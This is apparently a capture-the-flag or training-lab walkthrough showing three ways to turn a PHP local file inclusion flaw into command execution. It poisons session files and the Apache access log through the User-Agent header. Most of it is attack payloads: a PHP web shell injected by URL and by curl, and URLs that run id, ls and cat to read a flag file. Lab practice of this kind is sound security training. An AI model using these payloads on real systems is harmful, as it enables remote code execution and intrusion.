Log Poisoning

April 22, 2024

http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l

http://94.237.62.149:55216/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E

http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=id

http://94.237.62.149:55216/index.php?language=/var/lib/php/sessions/sess_f27p97en413cjh77fqgil2t24l&cmd=pwd

• Second way to do this

http://94.237.62.149:55216/index.php?language=/var/log/apache2/access.log

Change the User-Agent to "Apache Log Poisoning" so that we can determine if we can poison the log

Then we will inject the cmd get function for the php

Don't forget the double single quote

'<?php system($_GET['cmd']); ?>'

Then just use the command "&cmd=id" so that we can see the id of the current user

/index.php?language=/var/log/apache2/access.log&cmd=id

Now we can just use any other command that the log have now poisoned

/index.php?language=/var/log/apache2/access.log&cmd=ls

/index.php?language=/var/log/apache2/access.log&cmd=cd%20%2F%3B%20ls%20

# cd /; ls
# just got url encoded

/index.php?language=/var/log/apache2/access.log&cmd=cat%20%2Fc85ee5082f4c723ace6c0796e3a3db09.txt

# just url encoded

• Third way

We could also use this command to poison the apache log

curl -s "http://94.237.62.149:40752/index.php" -A "<?php system($_GET['cmd']); ?>"

Then we can just do it again with the burpsuite with this commnd

/index.php?language=/var/log/apache2/access.log&cmd=id